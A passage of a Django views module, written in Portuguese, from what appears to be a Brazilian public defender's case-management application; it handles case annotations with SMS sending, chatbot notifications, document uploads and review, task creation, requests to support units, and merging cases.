(qualificacao.eh_qualificacao_sms and config.USAR_SMS and config.SERVICO_SMS_DISPONIVEL)\r\n\r\n if (enviar_sms):\r\n # Substitui as palavras chaves no modelo MENSAGEM_SMS_ANOTACAO\r\n historico = config.MENSAGEM_SMS_ANOTACAO.replace(\r\n \"SMS_CONTEUDO_ANOTACAO\", form.cleaned_data['historico'], 1\r\n ).replace(\r\n \"SMS_DEF_SIGLA\", settings.SIGLA_INSTITUICAO\r\n )\r\n # Remove os acencos da mensagem se assim foi configurado\r\n if config.SMS_REMOVER_ACENTOS:\r\n historico = Util.unaccent(historico)\r\n anotacao.historico = historico\r\n\r\n # só registra dados de atendimento em anotações\r\n if self.atendimento_tipo == Atendimento.TIPO_ANOTACAO:\r\n anotacao.atendido_por = self.request.user.servidor\r\n anotacao.data_atendimento = timezone.now()\r\n\r\n if not settings.SIGLA_UF.upper() == 'AM':\r\n # obtem defensor/defensoria a partir da atuação\r\n anotacao.defensor = form.cleaned_data['atuacao'].defensor\r\n anotacao.defensoria = form.cleaned_data['atuacao'].defensoria\r\n\r\n if enviar_sms:\r\n telefone = atendimento.telefone_para_sms\r\n\r\n # Se o telefone não foi encontrado, algo deu errado\r\n # Mostra uma mensagem de erro\r\n if not telefone['telefone']:\r\n mensagem = \"Não foi possível enviar o SMS.\"\r\n if telefone['no_valid_cell']:\r\n mensagem += \" Nenhum telefone válido foi encontrado.\"\r\n if self.request.is_ajax():\r\n return JsonResponse({\r\n 'success': False,\r\n 'message': mensagem,\r\n 'anotacao': Util.object_to_dict(anotacao)\r\n })\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n telefone_numero = \"55{}{}\".format(telefone['telefone'].ddd, telefone['telefone'].numero)\r\n envio = envia_sms(historico, telefone_numero)\r\n\r\n if not (envio.status_code >= 200 and envio.status_code < 300):\r\n mensagem = \"Não foi possível enviar o SMS! Código do erro: {}\".format(envio.status_code)\r\n if self.request.is_ajax():\r\n return JsonResponse({\r\n 'success': False,\r\n 'message': mensagem,\r\n 'anotacao': Util.object_to_dict(anotacao)\r\n })\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n super(AnotacaoCreateView, self).form_valid(form)\r\n\r\n # salva documento vinculado a anotação\r\n if self.request.FILES:\r\n\r\n documento = AtendimentoDocumento(\r\n atendimento=self.object,\r\n data_enviado=timezone.now(),\r\n enviado_por=self.request.user.servidor)\r\n\r\n form_documento = DocumentoForm(self.request.POST, self.request.FILES, instance=documento)\r\n\r\n if form_documento.is_valid():\r\n form_documento.save()\r\n\r\n # força limpeza da árvore do atendimento\r\n if hasattr(atendimento.at_inicial, 'arvore'):\r\n atendimento.at_inicial.arvore.ativo = False\r\n atendimento.at_inicial.arvore.save()\r\n\r\n mensagem = \"Registro salvo com sucesso!\"\r\n\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': True, 'message': mensagem, 'anotacao': Util.object_to_dict(anotacao)})\r\n else:\r\n messages.success(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n def get_success_url(self):\r\n return self.request.META.get('HTTP_REFERER', '/')\r\n\r\n\r\nclass NotificacaoCreateView(AnotacaoCreateView):\r\n form_class = NotificacaoForm\r\n template_name = \"atendimento/atender_modal_notificacao_form.html\"\r\n atendimento_tipo = Atendimento.TIPO_NOTIFICACAO\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(NotificacaoCreateView, self).get_context_data(**kwargs)\r\n context['form_name'] = 'NotificacaoForm'\r\n context['notificar'] = True\r\n context['pode_notificar_assistido'] = False\r\n\r\n # Se houver, insere informações do documento que está sendo recusado\r\n if self.request.GET.get('documento_id'):\r\n context['documento'] = AtendimentoDocumento.objects.get(\r\n id=self.request.GET.get('documento_id'),\r\n analisar=True\r\n )\r\n\r\n # Verifica se o assistido pode ser notificado\r\n if config.USAR_NOTIFICACOES_ASSISTIDO_VIA_CHATBOT and self.atendimento:\r\n context['pode_notificar_assistido'] = self.atendimento.requerente.pessoa.aderiu_luna_chatbot\r\n\r\n return context\r\n\r\n def form_valid(self, form):\r\n\r\n result = super(NotificacaoCreateView, self).form_valid(form)\r\n\r\n assistido = Pessoa.objects.get(\r\n id=self.request.POST.get('assistido')\r\n )\r\n\r\n self.object.add_pessoa(\r\n pessoa_id=assistido.id,\r\n tipo=AtendimentoPessoa.TIPO_NOTIFICACAO,\r\n responsavel=False,\r\n vincular_ao_inicial=False\r\n )\r\n\r\n # Se houver, registra recusa de documento vinculado\r\n if self.request.POST.get('documento_id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(\r\n id=self.request.POST.get('documento_id'),\r\n analisar=True\r\n )\r\n\r\n documento.analisar = False\r\n documento.arquivo = None\r\n documento.data_enviado = None\r\n documento.enviado_por = None\r\n documento.save()\r\n\r\n chatbot_notificar_requerente_atendimento.apply_async(\r\n kwargs={\r\n 'numero': self.object.numero,\r\n 'pessoa_id': assistido.id\r\n },\r\n queue='sobdemanda'\r\n )\r\n\r\n return result\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_coletivo')\r\ndef salvar_comunidade(request, atendimento_numero):\r\n from assistido.models import Pessoa\r\n from assistido.forms import CadastrarEndereco, PessoaForm\r\n\r\n # resposta padrao\r\n resposta = {'success': False, 'errors': {}}\r\n errors = []\r\n\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n # carrega e trata dados recebidos via ajax\r\n dados = Dados(request.body)\r\n dados['tipo'] = constantes.TIPO_PESSOA_JURIDICA\r\n\r\n # tenta carregar registro, se nao conseguir carrega novo\r\n try:\r\n pessoa = Pessoa.objects.get(id=dados['id'])\r\n except Pessoa.DoesNotExist:\r\n pessoa = Pessoa()\r\n\r\n # verifica se já existe outra pessoa com o cpf informado\r\n if dados['cpf']:\r\n cpf_existe = Pessoa.objects.filter(cpf=dados['cpf']).exclude(id=dados['id'])\r\n else:\r\n cpf_existe = False\r\n\r\n if cpf_existe:\r\n\r\n errors.append('O cpf/cnpj informado já está vinculado a outra pessoa!')\r\n\r\n else:\r\n\r\n # recupera id do bairro a partir do municipio/nome\r\n if dados.get('bairro') is not None:\r\n try:\r\n bairro, msg = Bairro.objects.get_or_create(\r\n municipio_id=dados.get('municipio'),\r\n nome__iexact=dados.get('bairro'),\r\n desativado_em=None,\r\n defaults={\r\n # necessário por ter usado uma func no get_or_create para esse field\r\n 'nome': dados.get('bairro')\r\n }\r\n )\r\n except Exception:\r\n bairro = Bairro.objects.filter(\r\n municipio_id=dados.get('municipio'),\r\n nome__iexact=dados.get('bairro'),\r\n desativado_em=None,\r\n ).first()\r\n\r\n dados.set('bairro', bairro.id)\r\n\r\n pessoa_form = PessoaForm(dados.get_all(), instance=pessoa)\r\n\r\n if pessoa_form.is_valid():\r\n # TODO: Verificar consistencia ou remover\r\n novo = (pessoa.id == None) # noqa\r\n pessoa = pessoa_form.save()\r\n\r\n try:\r\n\r\n endereco_form = CadastrarEndereco(\r\n dados.get_all(),\r\n instance=pessoa.endereco,\r\n initial={\r\n 'estado': dados.get('estado'),\r\n 'municipio': dados.get('municipio')\r\n })\r\n\r\n except KeyError:\r\n endereco_form = CadastrarEndereco(dados.get_all(), instance=pessoa.endereco)\r\n\r\n if endereco_form.is_valid():\r\n pessoa.enderecos.add(endereco_form.save())\r\n\r\n else:\r\n # inclui erros no array de erros\r\n errors.append([(k, v[0]) for k, v in pessoa_form.errors.items()])\r\n\r\n if len(errors) == 0:\r\n\r\n resposta['success'] = True\r\n\r\n coletivo, msg = Coletivo.objects.get_or_create(atendimento=atendimento.at_inicial)\r\n coletivo.comunidade = pessoa\r\n coletivo.save()\r\n\r\n else:\r\n\r\n resposta['errors'] = errors\r\n\r\n resposta['id'] = pessoa.id\r\n resposta['pessoa'] = pessoa.to_dict()\r\n\r\n return JsonResponse(resposta)\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef salvar_documento(request, atendimento_numero):\r\n\r\n if request.method == 'POST':\r\n\r\n salvou, documento = salvar_documento_pre(request, atendimento_numero)\r\n\r\n if salvou and documento and documento.documento_online:\r\n\r\n if documento.atendimento.tipo == Atendimento.TIPO_ATIVIDADE:\r\n atendimento = documento.atendimento.origem\r\n else:\r\n atendimento = documento.atendimento\r\n\r\n sda = ServiceDocumentoAtendimento(documento)\r\n\r\n sda.preencher({\r\n 'defensoria': documento.documento_online.grupo_dono,\r\n 'atendimento': atendimento.at_defensor,\r\n 'servidor': request.user.servidor,\r\n 'pessoa': documento.pessoa,\r\n 'hoje': date.today(),\r\n })\r\n\r\n if documento.atendimento.tipo == Atendimento.TIPO_ATIVIDADE:\r\n\r\n for participante in documento.atendimento.participantes.all():\r\n documento.documento_online.adicionar_pendencia_de_assinatura_por_usuario(\r\n grupo=documento.atendimento.origem.defensor.defensoria,\r\n assinado_por=participante.usuario,\r\n cadastrado_por=request.user)\r\n\r\n if salvou and documento and documento.pendente:\r\n # Notifica assistido via chatbot Luna\r\n chatbot_notificar_requerente_documento.apply_async(\r\n kwargs={'documento_id': documento.id},\r\n queue='sobdemanda'\r\n )\r\n\r\n if request.is_ajax():\r\n\r\n documento_dict = None\r\n\r\n if salvou and documento:\r\n\r\n url = None\r\n filetype = None\r\n\r\n if documento.arquivo:\r\n url = documento.arquivo.url\r\n filetype, encoding = mimetypes.guess_type(documento.arquivo.url, strict=True)\r\n\r\n enviado_por_nome = None\r\n enviado_por_username = None\r\n\r\n if documento.enviado_por:\r\n enviado_por_nome = documento.enviado_por.nome\r\n enviado_por_username = documento.enviado_por.usuario.username\r\n\r\n cadastrado_por_nome = None\r\n cadastrado_por_username = None\r\n\r\n if documento.cadastrado_por:\r\n cadastrado_por_nome = documento.cadastrado_por.nome\r\n cadastrado_por_username = documento.cadastrado_por.usuario.username\r\n\r\n documento_dict = {\r\n 'id': documento.id,\r\n 'documento_online_id': documento.documento_online_id,\r\n 'nome': documento.nome,\r\n 'arquivo': url,\r\n 'enviado_por_nome': enviado_por_nome,\r\n 'enviado_por_username': enviado_por_username,\r\n 'data_enviado': documento.data_enviado,\r\n 'data_cadastro': documento.data_cadastro,\r\n 'cadastrado_por_username': cadastrado_por_username,\r\n 'cadastrado_por_nome': cadastrado_por_nome,\r\n 'filetype': filetype\r\n }\r\n\r\n resposta = {\r\n 'success': documento_dict is not None,\r\n 'errors': [(k, v[0]) for k, v in documento.items()] if documento and not salvou else [],\r\n 'documento': documento_dict\r\n }\r\n\r\n return JsonResponse(resposta)\r\n\r\n else:\r\n\r\n return redirect(request.POST['next'])\r\n\r\n else:\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef salvar_documento_pre(request, atendimento_numero, **kwags):\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n if request.POST.get('id'):\r\n documento = AtendimentoDocumento.objects.get(id=request.POST.get('id'))\r\n else:\r\n documento = AtendimentoDocumento(atendimento=atendimento, cadastrado_por=request.user.servidor)\r\n\r\n if request.FILES:\r\n\r\n documento.data_enviado = datetime.now()\r\n documento.enviado_por = request.user.servidor\r\n\r\n # Se possuía versão assinada, desativa e remove vínculo\r\n if documento.documento_assinado:\r\n documento.documento_assinado.desativar(usuario=request.user)\r\n documento.documento_assinado = None\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n return True, form.save()\r\n else:\r\n return False, form.errors\r\n\r\n return False, None\r\n\r\n\r\n@login_required\r\ndef auto_criar_documento_ged(request, atendimento_numero):\r\n\r\n cpf = request.GET.get('cpf')\r\n\r\n if not cpf and len(cpf) == 11:\r\n messages.error(request, 'Não foi possível criar o documento de ciência!
    Verifique se o cpf/cpnj do assistido foi informado corretamente.') # noqa: E501\r\n\r\n from .models import PessoaAssistida\r\n pessoa = PessoaAssistida.objects.ativos().filter(pessoa_ptr__cpf=cpf).first()\r\n\r\n atendimento_defensor = AtendimentoDefensor.objects.filter(numero=atendimento_numero).first()\r\n\r\n form = TabDocumentoForm(request.POST)\r\n\r\n if form.is_valid():\r\n\r\n data = form.cleaned_data\r\n modelo_ged = data['modelo']\r\n assunto_ged = data['assunto']\r\n\r\n try:\r\n criar_documento_ged_para_o_atendimento(\r\n modelo_ged,\r\n atendimento_defensor,\r\n pessoa,\r\n request.user,\r\n assunto=assunto_ged,\r\n liberar_para_assinar=True\r\n )\r\n except Exception as e:\r\n erro = str(e.args).replace('(', '').replace(')', '').replace(',', '.')\r\n\r\n messages.error(request, f'Não foi possível criar o documento GED!

    Erro técnico: < {erro} > ')\r\n\r\n return redirect('{}#/documentos'.format(\r\n reverse('atendimento_atender', args=[atendimento_numero]),\r\n ))\r\n\r\n\r\nclass DocumentoCriarParaAtendimento(SingleAtendimentoDefensorObjectMixin, DocumentoCriar):\r\n atendimentodefensor_queryset = AtendimentoDefensor.objects.only('numero')\r\n form_class = CriarDocumentoOnlineParaAtendimentoForm\r\n\r\n @method_decorator(permission_required('atendimento.add_documento'))\r\n def dispatch(self, request, *args, **kwargs):\r\n return super(DocumentoCriarParaAtendimento, self).dispatch(request, *args, **kwargs)\r\n\r\n def get_form_action(self):\r\n kwargs = {self.atendimentodefensor_slug_url_kwarg: self.atendimentodefensor_object.numero}\r\n action = reverse('atendimento_ged_criar', kwargs=kwargs)\r\n return action\r\n\r\n def get_form_kwargs(self):\r\n kwargs = super(DocumentoCriarParaAtendimento, self).get_form_kwargs()\r\n kwargs.update({\r\n 'atendimento': self.atendimentodefensor_object\r\n }\r\n )\r\n return kwargs\r\n\r\n def get_initial(self):\r\n\r\n initial = super(DocumentoCriarParaAtendimento, self).get_initial()\r\n grupo = self.atendimentodefensor_object.defensoria\r\n\r\n initial.update({\r\n 'grupo': grupo,\r\n })\r\n\r\n if self.request.GET.get('modelo_documento'):\r\n modelo_documento = DocumentoGED.admin_objects.get(pk_uuid=self.request.GET.get('modelo_documento'))\r\n initial.update({\r\n 'tipo_documento': modelo_documento.tipo_documento_id,\r\n 'modelo_documento': modelo_documento.pk_uuid,\r\n })\r\n\r\n return initial\r\n\r\n def form_valid(self, form):\r\n ret = super(DocumentoCriarParaAtendimento, self).form_valid(form)\r\n atendimento = self.atendimentodefensor_object.atendimento_ptr\r\n documento_online = self.object\r\n pessoa = form.cleaned_data['pessoa']\r\n pasta = form.cleaned_data.get('pasta', None)\r\n documento_atendimento = AtendimentoDocumento(\r\n atendimento=atendimento,\r\n documento_online=documento_online,\r\n cadastrado_por=self.request.user.servidor,\r\n nome=documento_online.assunto,\r\n pessoa=pessoa,\r\n pasta=pasta\r\n )\r\n documento_atendimento.save()\r\n\r\n context_conteudo = {\r\n 'defensoria': documento_online.grupo_dono,\r\n 'atendimento': self.atendimentodefensor_object,\r\n 'servidor': self.request.user.servidor,\r\n 'pessoa': pessoa,\r\n 'hoje': date.today(),\r\n }\r\n preencher_campos_ged(documento=documento_online, context_conteudo=context_conteudo, fallback_to_conteudo=True)\r\n documento_online.save()\r\n\r\n return ret\r\n\r\n\r\nclass DocumentoCriarParaAtendimentoViaModeloPublico(DocumentoCriarParaAtendimento):\r\n form_class = CriarDocumentoOnlineParaAtendimentoViaModeloPublicoForm\r\n\r\n def get_form_action(self):\r\n kwargs = {self.atendimentodefensor_slug_url_kwarg: self.atendimentodefensor_object.numero}\r\n action = reverse('atendimento_ged_criar_via_modelo_publico', kwargs=kwargs)\r\n return action\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef agendar_documento(request):\r\n\r\n if request.method == 'POST' and request.POST.get('id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(id=request.POST.get('id'))\r\n form = AgendarDocumentoForm(request.POST, instance=documento)\r\n\r\n if form.is_valid():\r\n\r\n documento = form.save(commit=False)\r\n\r\n if request.FILES:\r\n\r\n if documento.documento_resposta:\r\n resposta = documento.documento_resposta\r\n else:\r\n resposta = AtendimentoDocumento(\r\n atendimento=documento.atendimento,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n resposta.nome = '{} (RESPOSTA)'.format(documento.nome).upper()\r\n resposta.data_enviado = datetime.now()\r\n resposta.enviado_por = request.user.servidor\r\n resposta.ativo = True\r\n\r\n form_resposta = DocumentoRespostaForm(request.POST, request.FILES, instance=resposta)\r\n\r\n if form_resposta.is_valid():\r\n resposta = form_resposta.save()\r\n\r\n documento.documento_resposta = resposta\r\n\r\n documento.save()\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_documento')\r\ndef analisar_documento(request):\r\n\r\n if request.method == 'POST' and request.POST.get('id'):\r\n\r\n documento = AtendimentoDocumento.objects.get(\r\n id=request.POST.get('id'),\r\n analisar=True\r\n )\r\n\r\n if request.POST.get('aceitar') == 'true':\r\n documento.data_analise = datetime.now()\r\n documento.analisado_por = request.user.servidor\r\n documento.analisar = False\r\n documento.save()\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@permission_required('nucleo.add_resposta')\r\ndef salvar_formulario(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n dados = simplejson.loads(request.body)\r\n success = True\r\n\r\n formulario = FormularioNucleo.objects.get(id=dados['id'])\r\n\r\n novo = not RespostaNucleo.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n pergunta__formulario=formulario\r\n ).exists()\r\n\r\n for pergunta in dados['perguntas']:\r\n\r\n RespostaNucleo.objects.update_or_create(\r\n atendimento=atendimento.at_inicial,\r\n pergunta_id=pergunta['id'],\r\n defaults={\r\n 'texto': pergunta['resposta']\r\n }\r\n )\r\n\r\n if novo and formulario.gerar_alerta_em_atendimento:\r\n\r\n descricao = ''\r\n\r\n for pergunta in dados['perguntas']:\r\n descricao += '

    {}
    {}

    '.format(\r\n pergunta['texto'],\r\n pergunta['resposta'] if not pergunta['resposta'] is None else 'Não informado'\r\n )\r\n\r\n Tarefa.objects.create(\r\n atendimento=atendimento.at_inicial,\r\n resposta_para=atendimento.defensoria,\r\n setor_responsavel=formulario.nucleo.defensoria_set.ativos().first(),\r\n titulo=formulario.texto,\r\n descricao=descricao,\r\n data_inicial=date.today(),\r\n data_final=None,\r\n prioridade=Tarefa.PRIORIDADE_ALERTA,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n return JsonResponse({'success': success})\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.add_tarefa')\r\n@reversion.create_revision(atomic=False)\r\ndef salvar_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n dados = Dados(request.body)\r\n errors = []\r\n novo = True\r\n\r\n if dados.get('id'):\r\n tarefa = Tarefa.objects.get(id=dados.get('id'))\r\n novo = False\r\n else:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n tarefa = Tarefa(atendimento=atendimento, cadastrado_por=request.user.servidor)\r\n\r\n form = TarefaForm(dados.get_all(), instance=tarefa)\r\n\r\n if form.is_valid():\r\n\r\n tarefa = form.save()\r\n\r\n reversion.set_user(request.user)\r\n reversion.set_comment(Util.get_comment_save(request.user, tarefa, novo))\r\n\r\n else:\r\n errors.append([(k, v[0]) for k, v in form.errors.items()])\r\n\r\n return JsonResponse({'success': (len(errors) == 0), 'errors': errors, 'id': tarefa.id})\r\n\r\n\r\n@login_required\r\ndef solicitar_nucleo_form(request, atendimento_numero):\r\n\r\n return render(\r\n request,\r\n template_name=\"atendimento/atender_modal_nucleos.html\",\r\n context={\r\n 'atendimento_numero': atendimento_numero,\r\n })\r\n\r\n\r\n@login_required\r\ndef solicitar_nucleo(request, atendimento_numero):\r\n from defensor.models import Atuacao\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n atuacao_origem = Atuacao.objects.get(id=request.POST.get('atuacao'))\r\n\r\n atuacao_destino = Atuacao.objects.filter(\r\n defensoria_id=request.POST.get('defensoria'),\r\n tipo=Atuacao.TIPO_TITULARIDADE,\r\n ativo=True\r\n ).order_by(\r\n '-defensor__eh_defensor',\r\n 'data_inicial'\r\n ).first()\r\n\r\n agora = datetime.now()\r\n\r\n # se o atendimento de origem não tiver qualificação, assume qualificação do pedido de apoio\r\n if atendimento.qualificacao_id:\r\n qualificacao_id = atendimento.qualificacao_id\r\n else:\r\n qualificacao_id = request.POST.get('qualificacao')\r\n\r\n # cria solicitação do apoio\r\n pedido = AtendimentoDefensor(\r\n tipo=Atendimento.TIPO_RETORNO,\r\n inicial=atendimento.at_inicial,\r\n origem=atendimento,\r\n data_agendamento=agora,\r\n data_atendimento=agora,\r\n cadastrado_por=request.user.servidor,\r\n agendado_por=request.user.servidor,\r\n atendido_por=request.user.servidor,\r\n defensor=atuacao_origem.titular if atuacao_origem.titular else atuacao_origem.defensor,\r\n substituto=atuacao_origem.defensor if atuacao_origem.titular else None,\r\n defensoria=atuacao_origem.defensoria,\r\n qualificacao_id=qualificacao_id)\r\n\r\n sucesso = False\r\n form = NucleoPedidoForm(request.POST, instance=pedido)\r\n\r\n if form.is_valid():\r\n\r\n with transaction.atomic():\r\n\r\n pedido = form.save()\r\n\r\n # cria resposta do apoio\r\n resposta = AtendimentoDefensor(\r\n tipo=Atendimento.TIPO_NUCLEO,\r\n inicial=pedido.at_inicial,\r\n origem=pedido,\r\n cadastrado_por=request.user.servidor,\r\n agendado_por=request.user.servidor,\r\n defensor=atuacao_destino.defensor)\r\n\r\n form_resposta = NucleoRespostaForm(request.POST, instance=resposta)\r\n\r\n if form_resposta.is_valid():\r\n\r\n resposta = form_resposta.save()\r\n\r\n # se possuir documentos, os vincula à solicitação do apoio\r\n if 'documentos' in request.POST:\r\n\r\n # remove ids de documento em duplicidade\r\n documentos = []\r\n for documento in request.POST.getlist('documentos'):\r\n if documento not in documentos:\r\n documentos.append(documento)\r\n\r\n for documento in documentos:\r\n\r\n doc_original = AtendimentoDocumento.objects.get(id=documento)\r\n\r\n AtendimentoDocumento.objects.create(\r\n atendimento=pedido,\r\n pessoa=doc_original.pessoa,\r\n modelo=doc_original.modelo,\r\n documento=doc_original.documento,\r\n documento_online=doc_original.documento_online,\r\n arquivo=doc_original.arquivo,\r\n nome=doc_original.nome,\r\n data_enviado=doc_original.data_enviado, # mantem data envio original\r\n enviado_por=doc_original.enviado_por, # mantem usuario que enviou original\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n # se for para o núcleo de diligência, vincula pessoa à solicitação do apoio\r\n if request.POST.get('pessoa') and resposta.defensoria.nucleo.diligencia:\r\n\r\n pedido.add_pessoa(\r\n pessoa_id=request.POST.get('pessoa'),\r\n tipo=AtendimentoPessoa.TIPO_DILIGENCIA,\r\n responsavel=False,\r\n vincular_ao_inicial=False\r\n )\r\n\r\n titulo_tarefa = 'Diligência para {0}'.format(pedido.partes.first())\r\n\r\n else:\r\n\r\n titulo_tarefa = resposta.qualificacao.titulo\r\n\r\n # cria tarefa para acompanhamento do apoio\r\n tarefa = Tarefa(\r\n atendimento=pedido,\r\n cadastrado_por=request.user.servidor\r\n )\r\n\r\n form_tarefa = TarefaForm({\r\n 'prioridade': Tarefa.PRIORIDADE_ALERTA,\r\n 'titulo': titulo_tarefa.upper(),\r\n 'descricao': pedido.historico,\r\n 'data_inicial': date.today(),\r\n 'data_final': resposta.data_agendamento.date(),\r\n 'resposta_para': pedido.defensoria_id,\r\n 'setor_responsavel': resposta.defensoria_id\r\n }, instance=tarefa)\r\n\r\n if form_tarefa.is_valid():\r\n form_tarefa.save()\r\n sucesso = True\r\n else:\r\n transaction.set_rollback(True)\r\n\r\n else:\r\n transaction.set_rollback(True)\r\n\r\n if sucesso:\r\n messages.success(request, u'Pedido de apoio enviado com sucesso!')\r\n else:\r\n messages.error(request, u'Erro ao salvar, verifique se todos campos foram preenchidos corretamente!')\r\n\r\n if 'atendimento/recepcao/marcados/' in request.META.get('HTTP_REFERER', '/'):\r\n return redirect(request.META.get('HTTP_REFERER', '/'))\r\n\r\n elif request.POST.get('next'):\r\n return redirect(request.POST['next'])\r\n\r\n else:\r\n return redirect('{}#/historico'.format(reverse('atendimento_atender', args=[atendimento.numero])))\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef visualizar(request, atendimento_id):\r\n pass\r\n\r\n\r\n@login_required\r\ndef listar_atendimento_documentos_pendentes(request):\r\n servidor = request.user.servidor\r\n\r\n if hasattr(request.GET, 'submit'):\r\n page = 1\r\n else:\r\n page = request.GET.get('page')\r\n\r\n form = BuscarAtendimentoDocumentosForm(request.GET)\r\n\r\n if form.is_valid():\r\n\r\n filtro = request.GET.get('filtro')\r\n filtro_numero = re.sub('[^0-9]', '', filtro)\r\n\r\n comarca = request.session.get('comarca')\r\n\r\n atendimentos_lst = AtendimentoDefensor.objects.filter(\r\n Q(documento__ativo=True) &\r\n Q(documento__arquivo='') &\r\n Q(defensoria__comarca_id=comarca) &\r\n Q(ativo=True) &\r\n Q(remarcado=None) &\r\n (Q(tipo=Atendimento.TIPO_INICIAL) | Q(tipo=Atendimento.TIPO_RETORNO))\r\n ).distinct().order_by('-data_agendamento', '-data_atendimento')\r\n\r\n if len(filtro_numero) == 12: # Numero do Atendimento\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n numero=filtro_numero\r\n )\r\n\r\n elif len(filtro_numero) == 11: # Numero do CPF\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n partes__pessoa__cpf=filtro,\r\n partes__ativo=True\r\n )\r\n\r\n else:\r\n\r\n atendimentos_lst = atendimentos_lst.filter(\r\n partes__pessoa__nome__icontains=filtro,\r\n partes__ativo=True\r\n )\r\n\r\n paginacao = Paginator(atendimentos_lst, 25)\r\n\r\n try:\r\n atendimentos = paginacao.page(page)\r\n except PageNotAnInteger:\r\n atendimentos = paginacao.page(1)\r\n except EmptyPage:\r\n atendimentos = paginacao.page(paginacao.num_pages)\r\n\r\n angular = 'BuscarCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/busca_docs_pendentes.html\", context=locals())\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.change_atendimento')\r\ndef unificar(request, atendimento_principal, atendimento_secundario):\r\n\r\n primario = AtendimentoDefensor.objects.get(numero=atendimento_principal)\r\n secundario = AtendimentoDefensor.objects.get(numero=atendimento_secundario)\r\n\r\n # Pode unificar se principal for atendimento inicial ou de processo e secundário for processo\r\n if (primario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA, Atendimento.TIPO_PROCESSO] and\r\n secundario.tipo == Atendimento.TIPO_PROCESSO): # noqa: E501\r\n\r\n # Move relacionamentos dependentes para novo agendamento\r\n service = AtendimentoService(secundario)\r\n service.transferir_relacionamentos(\r\n atendimento_destino=primario,\r\n copiar_pessoas=True,\r\n transferir_pessoas=False\r\n )\r\n\r\n secundario.partes.update(ativo=False) # desativa pessoas do atendimento secundário\r\n secundario.ativo = False # desativa atendimento para processo\r\n secundario.save()\r\n\r\n processo = request.GET.get('processo', '')\r\n messages.success(request, u'Processo nº %s unificado ao atendimento atual!' % processo)\r\n\r\n # Pode unificar se principal e secundário forem inicial\r\n elif (primario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA] and\r\n secundario.tipo in [Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA]):\r\n\r\n service = AtendimentoService(secundario)\r\n service.transferir_relacionamentos(\r\n atendimento_destino=primario,\r\n copiar_pessoas=True,\r\n transferir_pessoas=False\r\n )\r\n\r\n hoje = datetime.now()\r\n dia_um = datetime(hoje.year, hoje.month, 1)\r\n\r\n # se não realizado ou realizado no mes vigente, vira tipo retorno\r\n if not secundario.data_atendimento or secundario.data_atendimento > dia_um:\r\n secundario.tipo = Atendimento.TIPO_RETORNO\r\n\r\n secundario.partes.update(ativo=False) # desativa pessoas do atendimento secundário\r\n secundario.inicial = primario # vincula atendimento duplicado ao atendimento principal\r\n secundario.save()\r\n\r\n messages.success(request, u'Atendimento nº %s unificado ao atendimento atual!' % secundario.numero)\r\n\r\n else:\r\n\r\n messages.error(request, u'Não foi possível unificar atendimentos!')\r\n\r\n return redirect('atendimento_atender', atendimento_principal)\r\n\r\n\r\n@login_required\r\ndef visualizar_acesso(request):\r\n defensor = request.user.servidor.defensor if hasattr(request.user.servidor, 'defensor') else None\r\n\r\n if defensor:\r\n defensorias = defensor.atuacoes(vigentes=True).values('defensoria_id')\r\n\r\n meus_atendimentos = Acesso.objects.filter(\r\n (\r\n (\r\n Q(atendimento__defensor__defensoria__in=defensorias) &\r\n Q(atendimento__ativo=True)\r\n ) |\r\n (\r\n\r\n Q(atendimento__retorno__defensor__defensoria__in=defensorias) &\r\n ~Q(atendimento__retorno__data_atendimento=None) &\r\n Q(atendimento__retorno__ativo=True)\r\n )\r\n ),\r\n data_revogacao=None,\r\n ativo=True\r\n ).distinct().order_by('-data_concessao')\r\n\r\n outros_atendimentos = Acesso.objects.filter(\r\n defensor=defensor,\r\n data_revogacao=None,\r\n ativo=True\r\n ).order_by('-data_concessao')\r\n\r\n angular = 'AcessoCtrl'\r\n\r\n return render(request=request, template_name=\"atendimento/acessos.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef listar_acesso(request, atendimento_numero):\r\n atendimento = Atendimento.objects.get(numero=atendimento_numero)\r\n resposta = {\r\n 'publico': bool(atendimento.acesso_publico()),\r\n 'historico': [],\r\n 'solicitacoes': 